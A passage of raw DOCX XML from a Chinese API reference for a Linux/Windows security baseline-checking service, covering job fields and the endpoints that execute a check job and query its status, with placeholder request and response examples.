          <w:p w14:paraId="03E7578E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D16A63F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48F4998D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jobid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2CC6D12C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="046E55B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>specName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17DAF977" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46A1159C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务规格名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="182B20BA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6253541B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>descroption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31CE88D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B63A12D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6BC879B5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49935031" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ruleId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="337852B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A0A64C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>基线规则id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5095D47A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04F2120A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ruleName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55AAB1B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1070C081" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>基线规则名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3E602881" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F052E54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>checkTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24CF1679" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="379DDE26" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检查时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="174F9664" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09FEA865" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="098EE1C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4977E316" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>持续时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7384B1DB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6349342C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostCount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A635E85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="212DC253" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6547EBEA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44A8183E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>failedHostCount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FB6DBC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2519AE7E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>失败主机数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="04A6CAD5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13326F8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>successHostCount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10EDBA75" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B16CC43" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>成功主机数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1B26F788" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DC01277" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>progress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C9124D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>float</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="073F1C22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>进度</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="22D7914D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40F2D234" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>passRate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E76FEC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>float</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="761871ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>通过率</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="593439C3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42EE08B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40D15B34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AA4A3FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>状态：0-Pending；1-Running；2-Done</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4398DCA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="182" w:name="执行任务-1"/>
      <w:bookmarkEnd w:id="181"/>
      <w:r>
        <w:t>执行任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A560BAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320A9BE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/baseline/job/{linux，win}/execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0ACAC6"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836"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1279"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="593C632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511E513" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A8DC6E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C14137C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4C3F6A13" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CB4803E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>specId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33A8C9C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D50B512" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务specId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37D54287" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6616E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "specId": "xxxx" //任务specId</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668957EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFF589F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": "success" //执行结果</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "xxxx" //jobId</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F79BB7"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788"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4A746AB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11D67B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="201FAB39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79F86CD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="10796CFC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F2EDCFF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73E11FC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E8C893B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="37EBB617" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D56BD24" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23A2CD65" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37AE61D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68B57369" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="183" w:name="查询任务执行任务"/>
      <w:bookmarkEnd w:id="182"/>
      <w:r>
        <w:t>查询任务执行任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141961EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCEB8AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/baseline/job/{linux，win}/getStatus/{specId}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118FE785"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836"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1279"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="181F670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8B199E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="306A22CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72C55A20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2676E4CE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07C12715" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>specId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1804FD70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="127B7CFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务specId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A348615" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C08A5E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "specId": "xxxx" //任务specId</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D15354" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73769122" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": "success" //查询结果</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "xxxx" //jobId</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AABA77"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788"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5E5146F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EC03D78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3003276B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="040C1369" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7CA62B62" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F1C1E76" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24C97F91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
